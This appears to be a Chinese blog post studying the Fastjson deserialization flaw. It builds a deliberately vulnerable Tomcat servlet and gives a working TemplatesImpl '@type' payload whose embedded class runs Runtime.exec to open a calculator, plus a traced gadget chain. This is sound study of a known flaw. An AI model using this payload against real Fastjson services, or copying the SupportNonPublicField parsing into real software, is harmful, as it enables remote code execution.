Maywishes
Maywishes

Fastjson漏洞学习

近期暴露了阿里的Fastjson反序列漏洞,作为一个安全小白,在网上搜索了很多大神书写的资料学习,并通过搭建环境的方式进行实践加深理解,在此记录学习过程。

1. 环境搭建

  Fastjson为Java语言编写,因此为了实践,首先需要搭建一个使用Fastjson的Web服务,此处选择使用Tomcat方式部署Web,因此先安装Tomcat。

1.1Tomcat安装

  Tomcat依赖Java,首先查看Java版本,本机版本为JDK1.8,满足Tomcat7.0版本要求。


前往Tomcat官网https://tomcat.apache.org/download-70.cgi根据操作系统版本下载对应的Tomcat。 

  将下载的Tomcat放到安装目录下解压,此处选择为/opt目录,如下图:

Tomcat的目录结构如下:



修改环境变量



image.png

此时Tomcat安装完成,可以启动Tomcat。

测试Tomcat是否成功启动


1.2 Eclipse配置Tomcat服务器

  在Eclipse的菜单中选择"Windows"-->"Preferences"-->"Server"-->"Runtime Environments"

选择添加所安装的对应的Tomcat版本,此处为Tomcat7。



创建完成后如下


1.3 书写简单的Demo环境

  书写简单的代码,接收客户端提交的JSON字符串,并使用Fastjson进行解析。

IndexServlet.java

package fastt;

import java.io.IOException;
import java.io.PrintWriter;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import com.alibaba.fastjson.JSON;

class Person {
    private int age;
    public String username;
    private String hobby;
    
    public Person() {
        
    }
    
    public Person(int age, String username, String hobby){
        this.age = age;
        this.username = username;
        this.hobby = hobby;
    }
    
    public int getAge(){
        return this.age;
    }
    public void setAge(int age){
        this.age = age;
    }
    public String getUsername(){
        return this.username;
    }
    public void setUsername(String username){
        this.username = username;
    }
    public String getHobby(){
        return this.hobby;
    }
    public void setHobby(String hobby){
        this.hobby = hobby;
    }
}
@WebServlet("/IndexServlet")
public class IndexServlet extends HttpServlet{
    
    /**
     * 
     */
    private static final long serialVersionUID = 1L;

    public IndexServlet() {
        super();
    }
    public void destroy() {
        super.destroy();
    }
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
        
    }
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
        String json_string = request.getParameter("json_string");
        System.out.println(json_string);
        Person p = JSON.parseObject(json_string, Person.class);
        PrintWriter writer = response.getWriter();
        String htmlRespone = "";
        htmlRespone += "
Your input is: 
";
        htmlRespone += "user name: " + p.getUsername() + "
";
        htmlRespone += "age: " + p.getAge() + "
";
        htmlRespone += "hobby: " + p.getHobby() + "
";
        htmlRespone += "";
        writer.println(htmlRespone);
    }
}


index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>




welcome hahaha


    welcome, eclipse deploy tomcat
    

        Input: 

        
    




  在Eclipse中启动Tomcat

通过浏览器访问并提交json字符串



结果如下



到此我们的环境已经成功搭建。

2. Fastjson漏洞测试

在附录参考文档中,学习了Fastjson漏洞的知识,根据前人的经验,构造POC测试代码。

import java.io.IOException;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.serializer.SerializerFeature;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class User extends AbstractTranslet{
    public String username;
    public String password;
    public User() throws IOException{
        Runtime.getRuntime().exec("gnome-calculator");
    }
    /*
    public String getUsername() {
        return this.username;
    }
    public void setUsername(String username) {
        this.username = username;
    }
    public String getPassword() {
        return this.password;
    }
    public void setPassword(String password) {
        this.password = password;
    }
    */
    public static void main(String[] args) {
        /*
        User user = new User();
        user.setUsername("admin");
        user.setPassword("123456");
        
        String entry1 = JSON.toJSONString(user);
        System.out.println(entry1);
        
        String entry2 = JSON.toJSONString(user,SerializerFeature.WriteClassName);
        System.out.println(entry2);
        */
        String jsonString = "{\"@type\":\"fastt.User\",\"password\":\"123456\",\"username\":\"admin\"}";
        Object user = JSON.parseObject(jsonString);
        System.out.println(user);
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
        // TODO Auto-generated method stub
        
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
            throws TransletException {
        // TODO Auto-generated method stub
        
    }
}

其中该User类继承自AbstractTranslet类,后面可看到原因。
直接运行该代码,Fastjson在解析json的时候会调用默认构造函数,此时会弹出计算器。


将User的class文件保存到本地,此处保存在/home/hadoop/Downloads/路径下,构造Payload的代码如下:

public class POC {
    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)),bos);
        }catch(IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }
    public static void  test_autoTypeDeny() throws Exception {
        ParserConfig config = new ParserConfig();
        final String fileSeparator = System.getProperty("file.separator");
        final String evilClassPath = "/home/hadoop/Downloads/User.class";
        String evilCode = readClass(evilClassPath);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }," +
                "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        System.out.println(text1);

        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
        //assertEquals(Model.class, obj.getClass());
    }
    public static void main(String args[]){
        try {
            test_autoTypeDeny();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

可以看到_bytecodes字段的value即是User.class的内容。@type为com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl。

此处贴出TemplateImpl类的重要函数代码

public synchronized Properties getOutputProperties() {
    try {
        return newTransformer().getOutputProperties();
    }
    catch (TransformerConfigurationException e) {
        return null;
    }
}

public synchronized Transformer newTransformer()
    throws TransformerConfigurationException
{
    TransformerImpl transformer;
    transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
        _indentNumber, _tfactory);
    if (_uriResolver != null) {
        transformer.setURIResolver(_uriResolver);
    }
    if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
        transformer.setSecureProcessing(true);
    }
    return transformer;
}

private Translet getTransletInstance()
        throws TransformerConfigurationException {
        try {
            if (_name == null) return null;
            if (_class == null) defineTransletClasses();
            // The translet needs to keep a reference to all its auxiliary
            // class to prevent the GC from collecting them
            AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
            translet.postInitialization();
            translet.setTemplates(this);
            translet.setServicesMechnism(_useServicesMechanism);
            if (_auxClasses != null) {
                translet.setAuxiliaryClasses(_auxClasses);
            }
            return translet;
        }
        catch (InstantiationException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (IllegalAccessException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

private void defineTransletClasses()
        throws TransformerConfigurationException {
        if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }
        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader());
                }
            });
        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];
            if (classCount > 1) {
                _auxClasses = new Hashtable();
            }
            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();
                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }
            if (_transletIndex < 0) {
                ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
                throw new TransformerConfigurationException(err.toString());
            }
        }
        catch (ClassFormatError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (LinkageError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

处理Post请求的代码

public class IndexServlet extends HttpServlet{
    
    /**
     * 
     */
    private static final long serialVersionUID = 1L;

    public IndexServlet() {
        super();
    }
    public void destroy() {
        super.destroy();
    }
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
        
    }
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
        String json_string = request.getParameter("json_string");
        System.out.println(json_string);
        //ParserConfig config = new ParserConfig();
        Object obj = JSON.parseObject(json_string, Object.class, Feature.SupportNonPublicField);
        //JSONObject p = JSON.parseObject(json_string);
        PrintWriter writer = response.getWriter();
        String htmlRespone = "";
        htmlRespone += "
Your input is: 
";
        htmlRespone += "user name: " + obj.toString() + "
";
        //htmlRespone += "age: " + p.get("age") + "
";
        //htmlRespone += "hobby: " + p.get("hobby") + "
";
        htmlRespone += "";
        writer.println(htmlRespone);
    }

其中在使用JSON.parseObject函数时,使用了参数Feature.SupportNonPublicField,这是由于Fastjson默认只能解析public字段,而像本例中的_bytecode,_outputProperties等都是private属性的,因此需要配置此参数。
在客户端提交请求,并跟踪处理逻辑。



可以看到JSON.parseObject函数会解析json字符串。

根据@type字段获取到对应的类:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl


使用JavaBean进行反序列化,使用JavaBean的deserialize方法。


调用smartMatch方法,本来Field是_outputProperties,使用smartMatch后转变为outputProperties。


可以看到fieldDeserializer的值已经是outputProperties。



调用deserialize方法



调用serValue方法


调用到TemplatesImpl类的getOutputProperties方法。



调用到TemplatesImpl类的getTransletInstance()方法


调用到TemplatesImpl类的defineTransletInstance()方法,在defineTransletClasses方法中会根据_bytecodes来生成一个java类,生成的java类随后会被getTransletInstance方法用到生成一个实例。此时可以看到返回的类会被强制转换成AbstractTranslet类,这也就是前面构造的User类需要继承自AbstractTranslet类的原因。



上图中的newInstace()方法,会调用User()的默认构造函数,从而执行默认构造函数中的Runtime.getRuntime().exec("gnome-calculator"),弹出计算器。



参考文档:

  1. https://www.freebuf.com/sectool/165655.html
  2. https://paper.seebug.org/292/
  3. https://www.freebuf.com/column/180711.html

你可能感兴趣的:(Fastjson漏洞学习)

  • 【数据结构】字符串与JSON字符串、JSON字符串及相应数据结构(如对象与数组)之间的相互转换 理想青年宁兴星 数据结构数据结构jsonjava
    前言:下面打印日志用的是FastJSON依赖库中的@Log4j2。依赖:com.alibabafastjson1.2.80目录普通字符串->json字符串json字符串->普通字符串java对象->json字符串json字符串->java对象普通字符串->json字符串代码:publicstaticvoidmain(String[]args){Strings="ningxingxing";Stri
  • 【SpringMVC】五、Json数据交互 Json乱码处理 Jackson Fastjson【狂神篇】 Y1567409 程序员json交互
    简洁和清晰的层次结构使得JSON成为理想的数据交换语言。易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。在JavaScript语言中,一切都是对象。因此,任何JavaScript支持的类型都可以通过JSON来表示,例如字符串、数字、对象、数组等。要求和语法格式:对象表示为键值对,数据由逗号分隔花括号保存对象方括号保存数组JSON键值对是用来保存JavaScript对象的一种方
  • [Moshi]认识新一代对Kotlin友好的JSON解析框架 天空光芒
    为什么是Moshi切换到kotlin之后,在使用fastJSON时遇到了一些问题,经过网上的查询,要使fastJSON能够正常工作,需要额外添加kotlin-reflect依赖,感觉不是很爽。于是一通搜索之后,找到了著名的Square团队的又一个优秀的开源库——Moshi。它在允许使用传统的反射机制进行JSON序列化与反序列化的同时,也可以通过注解的方式在编译时生成解析类,不必引入2M+的refl
  • JAVA XML转JSON工具类 张志飞 xmljson
    packagecom.cm.util.xmlutl;importcom.alibaba.fastjson.JSONArray;importcom.alibaba.fastjson.JSONObject;importorg.apache.log4j.Logger;importorg.dom4j.*;importjava.io.File;importjava.io.FileInputStream;im
  • Java将Json文件并转换成Excel表格 sh顺其自然 后端项目学习记录exceljava开发语言
    Java将Json文件并转换成Excel表格1、依赖com.alibabafastjson2.0.12org.apache.poipoi3.14org.apache.poipoi-ooxml3.142、核心类、方法2.1、创建Excel表及表单//创建Excel文件HSSFWorkbookwb=newHSSFWorkbook();//创建Excel表单,表单名为sheet(可以用wb创建多个HSS
  • Java实战:JSON文件到Excel文件的转换 潘多编程 java高级javajsonexcel
    步骤添加依赖首先,确保你的项目中已经添加了fastjson和poi的依赖。如果你使用的是Maven,可以在pom.xml中添加以下依赖:xml复制代码com.alibabafastjson1.2.78org.apache.poipoi5.0.0org.apache.poipoi-ooxml5.0.0解析JSON文件使用fastjson库来解析JSON文件,并将其转换为Java对象。3.创建Exce
  • 使用hutool实现http的调用 Clsrm http网络协议网络
    http的调用方式有很多我这里选取了hutool工具包的封装方法进行调用,超级方便!!!依赖:cn.hutoolhutool-all5.8.11调用方法,因为我要使用到AES加密所以方法里调用了其他方法packagecom.huixin.nursing.util;importcn.hutool.http.HttpRequest;importcom.alibaba.fastjson.JSONObje
  • RSA工具包 雨夜星空丶月 工具java
    RSAUtils代码代码importcom.alibaba.fastjson2.JSON;importcom.alibaba.fastjson2.JSONWriter;importlombok.extern.slf4j.Slf4j;importorg.apache.tomcat.util.codec.binary.Base64;importjavax.crypto.Cipher;importjav
  • Java中金蝶凭证xml转wswsvoucher对象 chenmingfa110 xmljava前端
    1.引入maven依赖包javax.xml.bindjaxb-api2.3.1com.alibaba.fastjson2fastjson22.0.41org.projectlombok    lombok            1.18.322.改造vo:2.1凭证xml格式如下:110011002024-08-21......其他属性省略11002024-08-21......其他属性省略2.2
  • csv文件生成与解析 liyongbing1122 java
    com.alibaba.fastjson2fastjson22.0.1org.apache.commonscommons-csv1.9.01.csv文件生成//接口地址@Value("${jk.device.uri}")privateStringrequestURI;//生成文件存放路径@Value("${jk.file.path}")privateStringfilePath;@Schedule
  • FastJson使用 Annaday javaspring
    FastJson引入依赖com.alibabafastjson1.2.47序列化使用的实体类和统一结果类在文章末尾将User对象转化为json字符串@TestvoidcontextLoads(){Useruser=newUser();String[]hobbies={"sing","dance","rap"};user.setId(1L);user.setUsername("kunkun");us
  • RapidJson开源库使用 不朽の燃梦 QtC++开源库开源c++qt
    1.下载GitHub-Tencent/rapidjson:AfastJSONparser/generatorforC++withbothSAX/DOMstyleAPIAfastJSONparser/generatorforC++withbothSAX/DOMstyleAPI-Tencent/rapidjsonhttps://github.com/Tencent/rapidjson官方使用手册:Ra
  • 关于TypeReference的使用 韩_师兄 技能点javajackson
    关于TypeReference的使用在项目中,有遇到TypeReference的使用,其主要在字符串转对象过程中,对于序列化和反序列化中也有效果,将字符串转换成自定义对象.1说明以常见为例,在com.alibaba.fastjson包下面的TypeReference类,是指Type的Reference,表示某类型的一个指向或者引用.protectedTypeReference(){//当前类父类的
  • java的JsonObject取值方法 ʚ小华 javajsonwebview
    importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.JSONArray;importcom.alibaba.fastjson.JSONObject;importio.swagger.models.auth.In;importjava.io.IOException;importjava.security.KeyManagementEx
  • JAVA 请求api接口 post方式 json参数 通用工具 习惯沉淀_ javajsonhttp
    importcom.alibaba.fastjson.JSONArray;importcom.alibaba.fastjson.JSONObject;importorg.apache.http.HttpResponse;importorg.apache.http.HttpStatus;importorg.apache.http.client.methods.HttpPost;importorg.a
  • 036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入 wusuowei2986 安全java-eelog4j
    036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入#知识点:1、JavaEE-组件安全-Log4j2、JavaEE-组件安全-Fastjson3、JavaEE-基本了解-JNDI-API演示案例:➢Java-三方组件-Log4J&JNDI➢Java-三方组件-FastJson&反射#Java-项目管理工具-配置Jar仓库:https://mvnre
  • 转换会报错:com.alibaba.fastjson.jsonexception: syntax error, expect {, actual string, pos 82 深街&酒肆 java开发语言
    我的是pos82转化工具类转换是没问题的Objectobj=JSONObject.toJSONString(obj)Demedeme=JSONObject.parseObject(obj,Deme.clazz);返回的实体类@JsonProperty(value="file_url")privateListfiles;publicListgetfiles(){returnfiles;}public
  • Caused by: com.alibaba.fastjson.JSONException: autoType is not support 风流倜傥唐伯虎
    那是因为你把数据存进redis中的时候,使用了GenericFastJsonRedisSerializer来序列化和反序列化redis的value值解决办法:1.返回对象必须要有个无参构造方法,否则报错2.可以使用JdkSerializationRedisSerializer,只不过JdkSerializationRedisSerializer在redis中保存的是二进制,而GenericFast
  • com.alibaba.fastjson.JSONException: toJSON error的原因 贝la 工作中遇到的bugjava
    问题:导出接口报错,显示json格式化异常发现问题:第一个参数为HttpResponse,转换成json的时候报错修改方法:1.调换两个参数的位置2.在aop判断里边把ServletAPI过滤掉@Before("excudeWebController()")publicvoidbeforeInsert(JoinPointpoint)throwsWebException{Object[]args=p
  • java接口报com.alibaba.fastjson.JSONException: TODO 天龙拳 javajava
    详细错误com.alibaba.fastjson.JSONException:TODOatcom.alibaba.fastjson.util.TypeUtils.getRawClass(TypeUtils.java:2019)~[fastjson-1.2.31.jar!/:na]atcom.alibaba.fastjson.util.TypeUtils.createCollection(TypeU
  • java中实体pojo对于布尔类型属性命名尽量别以is开头,否则 fastjson可能会导致属性读取不到 阿文弟 java开发语言
    假如我们有一个场景,就是需要将一个对象以字符串的形式,也就是jsonString存到一个地方,比如mysql,或者redis的String结构。现在有一个实体,我们自己创建的,叫做CusPojo.java有两个属性是布尔类型的,一个属性是有is开头,一个是没有is开头的,我们就可以做个对比。现在我导入fastjson依赖,创建一个CusPojo对象,然后序列化为jsonString,我们打印结果如
  • json 数组 string转化 爱吃苹果的西瓜
    引入fastjson的包Json转化成对象(数组,等···)//将jsonArray转成数组JSONArrayjsonArray=JSONObject.parseArray("list");Listlist=newLinkedList();if(null!=jsonArray){intlen=jsonArray.size();for(inti=0;i<=len;i++){list.add(json
  • 解析json为List<Map<String, String>> zyp_0918 java开发语言后端
    com.alibabafastjson1.2.78Objectobj="";StringjsonStr=JSON.toJSONString(obj);List>maps=JSON.parseObject(jsonStr,newTypeReference>>(){});
  • 如何把List<Map<String,Object>>的数据显示在前端 小白程序猿一枚 错误SpringBoot框架学习list前端json
    首先导入allibaba的fastJsoncom.alibabafastjson1.1.46.sec01我的想法是先把List>的数据转换成Json【String】,然后再把Json转换成list,最后在前端遍历,具体方法如下List>userList=userService.selectUserAll();StringtoJSON=JSON.toJSONString(userList);//Us
  • fastjson 将json字符串转化为List<Map<String, Object>>对象 饽饽2023 编程技巧jsonjavaidea
    使用阿里巴巴的fastjson将json字符串格式的字符串转换为响应的对象格式:StringjsonStr="[{\"name\":\"张三\",\"id\":1},{\"name\":\"李四\",\"id\":2}]";List>resultList=JSON.parseObject(jsonStr,newTypeReference>>(){});不限于List>对象格式,其他的对象也同样适用
  • 本地缓存工具类 Fairy要carry 工具缓存
    com.google.guavaguava30.1-jrepackagecom.wyh.subject.domain.util;importcom.alibaba.fastjson.JSON;importcom.baomidou.mybatisplus.core.toolkit.CollectionUtils;importcom.google.common.cache.Cache;importco
  • 本地缓存工具类 Fairy要carry 工具缓存
    com.google.guavaguava30.1-jrepackagecom.wyh.subject.domain.util;importcom.alibaba.fastjson.JSON;importcom.baomidou.mybatisplus.core.toolkit.CollectionUtils;importcom.google.common.cache.Cache;importco
  • SpringBoot拾级而上·整合 Fastjson BestFei
    一、添加Fastjson依赖build.gradle文件dependencies中添加最新版本可从这里获取https://mvnrepository.com/artifact/com.alibaba/fastjsoncompilegroup:'com.alibaba',name:'fastjson',version:'1.2.47'二、创建一个配置管理类WebConfigpackagecom.sp
  • SpringMVC 西南方向 javaservletmvcspringajax
    SpringMVC1.SpringMVC简介1.1概念1.2SpringMVC执行原理2.第一个SpringMVC2.1不使用注解2.2使用注解3.Controller&RestFul3.1RestFul3.2转发与重定向3.3接收参数与数据回显3.4乱码问题4.JSON4.1初识JSON4.2Jackson-Databind4.3FastJson5.SSM整合5.1环境准备5.2项目结构5.3整
  • 【Web】CVE-2022-22947 SpringCloud Gateway SpEL漏洞学习 Z3r4y springcloudgatewayvulhubctfwebCVE-2022-22947CVE
    目录简介Actuator操作Gateway接口列表复现流程漏洞复现简单原理简介SpringBootActuator和SpringCloudGateway是Spring生态系统中的两个关键组件,它们在微服务架构中扮演着不同的角色,下面简要介绍它们之间的关系:SpringBootActuator:SpringBootActuator是SpringBoot提供的一个功能强大的监控和管理端点,可以用于监视
  • java线程Thread和Runnable区别和联系 zx_code javajvmthread多线程Runnable
    我们都晓得java实现线程2种方式,一个是继承Thread,另一个是实现Runnable。 模拟窗口买票,第一例子继承thread,代码如下 package thread; public class ThreadTest { public static void main(String[] args) { Thread1 t1 = new Thread1(
  • 【转】JSON与XML的区别比较 丁_新 jsonxml
    1.定义介绍 (1).XML定义 扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML使用DTD(document type definition)文档类型定义来组织数据;格式统一,跨平台和语言,早已成为业界公认的标准。 XML是标
  • c++ 实现五种基础的排序算法 CrazyMizzz C++c算法
    #include<iostream> using namespace std; //辅助函数,交换两数之值 template<class T> void mySwap(T &x, T &y){ T temp = x; x = y; y = temp; } const int size = 10; //一、用直接插入排
  • 我的软件 麦田的设计者 我的软件音乐类娱乐放松
         这是我写的一款app软件,耗时三个月,是一个根据央视节目开门大吉改变的,提供音调,猜歌曲名。1、手机拥有者在android手机市场下载本APP,同意权限,安装到手机上。2、游客初次进入时会有引导页面提醒用户注册。(同时软件自动播放背景音乐)。3、用户登录到主页后,会有五个模块。a、点击不胫而走,用户得到开门大吉首页部分新闻,点击进入有新闻详情。b、
  • linux awk命令详解 被触发 linux awk
    awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息 awk处理过程: 依次对每一行进行处理,然后输出 awk命令形式: awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END{}’ file [-F|-f|-v]大参数,-F指定分隔符,-f调用脚本,-v定义变量 var=val
  • 各种语言比较 _wy_ 编程语言
                        Java Ruby PHP 擅长领域                  
  • oracle 中数据类型为clob的编辑 知了ing oracle clob
    public void updateKpiStatus(String kpiStatus,String taskId){ Connection dbc=null; Statement stmt=null; PreparedStatement ps=null; try { dbc = new DBConn().getNewConnection(); //stmt = db
  • 分布式服务框架 Zookeeper -- 管理分布式环境中的数据 矮蛋蛋 zookeeper
    原文地址: http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/ 安装和配置详解 本文介绍的 Zookeeper 是以 3.2.2 这个稳定版本为基础,最新的版本可以通过官网 http://hadoop.apache.org/zookeeper/来获取,Zookeeper 的安装非常简单,下面将从单机模式和集群模式两
  • tomcat数据源 alafqq tomcat
    数据库 JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。 没有使用JNDI时我用要这样连接数据库: 03.  Class.forName("com.mysql.jdbc.Driver");  04.  conn
  • 遍历的方法 百合不是茶 遍历
                                                          遍历 在java的泛
  • linux查看硬件信息的命令 bijian1013 linux
    linux查看硬件信息的命令 一.查看CPU: cat /proc/cpuinfo   二.查看内存: free   三.查看硬盘: df   linux下查看硬件信息 1、lspci 列出所有PCI 设备; lspci - list all PCI devices:列出机器中的PCI设备(声卡、显卡、Modem、网卡、USB、主板集成设备也能
  • java常见的ClassNotFoundException bijian1013 java
    1.java.lang.ClassNotFoundException: org.apache.commons.logging.LogFactory   添加包common-logging.jar2.java.lang.ClassNotFoundException: javax.transaction.Synchronization    
  • 【Gson五】日期对象的序列化和反序列化 bit1129 反序列化
    对日期类型的数据进行序列化和反序列化时,需要考虑如下问题:   1. 序列化时,Date对象序列化的字符串日期格式如何 2. 反序列化时,把日期字符串序列化为Date对象,也需要考虑日期格式问题 3. Date A -> str -> Date B,A和B对象是否equals   默认序列化和反序列化     import com
  • 【Spark八十六】Spark Streaming之DStream vs. InputDStream bit1129 Stream
      1. DStream的类说明文档:   /** * A Discretized Stream (DStream), the basic abstraction in Spark Streaming, is a continuous * sequence of RDDs (of the same type) representing a continuous st
  • 通过nginx获取header信息 ronin47 nginx header
    1. 提取整个的Cookies内容到一个变量,然后可以在需要时引用,比如记录到日志里面, if ( $http_cookie ~* "(.*)$") {         set $all_cookie $1; }     变量$all_cookie就获得了cookie的值,可以用于运算了
  • java-65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 bylijinnan java
    参考了网上的http://blog.csdn.net/peasking_dd/article/details/6342984 写了个java版的: public class Print_1_To_NDigit { /** * Q65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 * 1.使用字符串
  • Netty源码学习-ReplayingDecoder bylijinnan javanetty
    ReplayingDecoder是FrameDecoder的子类,不熟悉FrameDecoder的,可以先看看 http://bylijinnan.iteye.com/blog/1982618 API说,ReplayingDecoder简化了操作,比如: FrameDecoder在decode时,需要判断数据是否接收完全: public class IntegerH
  • js特殊字符过滤 cngolon js特殊字符js特殊字符过滤
    1.js中用正则表达式 过滤特殊字符, 校验所有输入域是否含有特殊符号function stripscript(s) {    var pattern = new RegExp("[`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()&mdash;—|{}【】‘;:”“'。,、?]"
  • hibernate使用sql查询 ctrain Hibernate
    import java.util.Iterator; import java.util.List; import java.util.Map; import org.hibernate.Hibernate; import org.hibernate.SQLQuery; import org.hibernate.Session; import org.hibernate.Transa
  • linux shell脚本中切换用户执行命令方法 daizj linuxshell命令切换用户
    经常在写shell脚本时,会碰到要以另外一个用户来执行相关命令,其方法简单记下:   1、执行单个命令:su - user -c "command" 如:下面命令是以test用户在/data目录下创建test123目录 [root@slave19 /data]# su - test -c "mkdir /data/test123" 
  • 好的代码里只要一个 return 语句 dcj3sjt126com return
    别再这样写了:public boolean foo() {    if (true) {         return true;     } else {          return false;    
  • Android动画效果学习 dcj3sjt126com android
    1、透明动画效果 方法一:代码实现 public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.fragment_main, container, fals
  • linux复习笔记之bash shell (4)管道命令 eksliang linux管道命令汇总linux管道命令linux常用管道命令
    转载请出自出处: http://eksliang.iteye.com/blog/2105461     bash命令执行的完毕以后,通常这个命令都会有返回结果,怎么对这个返回的结果做一些操作呢?那就得用管道命令‘|’。     上面那段话,简单说了下管道命令的作用,那什么事管道命令呢?     答:非常的经典的一句话,记住了,何为管
  • Android系统中自定义按键的短按、双击、长按事件 gqdy365 android
    在项目中碰到这样的问题: 由于系统中的按键在底层做了重新定义或者新增了按键,此时需要在APP层对按键事件(keyevent)做分解处理,模拟Android系统做法,把keyevent分解成: 1、单击事件:就是普通key的单击; 2、双击事件:500ms内同一按键单击两次; 3、长按事件:同一按键长按超过1000ms(系统中长按事件为500ms); 4、组合按键:两个以上按键同时按住;
  • asp.net获取站点根目录下子目录的名称 hvt .netC#asp.nethovertreeWeb Forms
    使用Visual Studio建立一个.aspx文件(Web Forms),例如hovertree.aspx,在页面上加入一个ListBox代码如下: <asp:ListBox runat="server" ID="lbKeleyiFolder" />   那么在页面上显示根目录子文件夹的代码如下: string[] m_sub
  • Eclipse程序员要掌握的常用快捷键 justjavac javaeclipse快捷键ide
      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。   曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  写道 程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可
  • c++编程随记 lx.asymmetric C++笔记
     为了字体更好看,改变了格式……   &&运算符:   #include<iostream> using namespace std; int main(){      int a=-1,b=4,k;      k=(++a<0)&&!(b--
  • linux标准IO缓冲机制研究 音频数据 linux
    一、什么是缓存I/O(Buffered I/O)缓存I/O又被称作标准I/O,大多数文件系统默认I/O操作都是缓存I/O。在Linux的缓存I/O机制中,操作系统会将I/O的数据缓存在文件系统的页缓存(page cache)中,也就是说,数据会先被拷贝到操作系统内核的缓冲区中,然后才会从操作系统内核的缓冲区拷贝到应用程序的地址空间。1.缓存I/O有以下优点:A.缓存I/O使用了操作系统内核缓冲区,
  • 随想 生活 暗黑小菠萝 生活
    其实账户之前就申请了,但是决定要自己更新一些东西看也是最近。从毕业到现在已经一年了。没有进步是假的,但是有多大的进步可能只有我自己知道。   毕业的时候班里12个女生,真正最后做到软件开发的只要两个包括我,PS:我不是说测试不好。当时因为考研完全放弃找工作,考研失败,我想这只是我的借口。那个时候才想到为什么大学的时候不能好好的学习技术,增强自己的实战能力,以至于后来找工作比较费劲。我
  • 我认为POJO是一个错误的概念 windshome javaPOJO编程J2EE设计
                  这篇内容其实没有经过太多的深思熟虑,只是个人一时的感觉。从个人风格上来讲,我倾向简单质朴的设计开发理念;从方法论上,我更加倾向自顶向下的设计;从做事情的目标上来看,我追求质量优先,更愿意使用较为保守和稳妥的理念和方法。    &
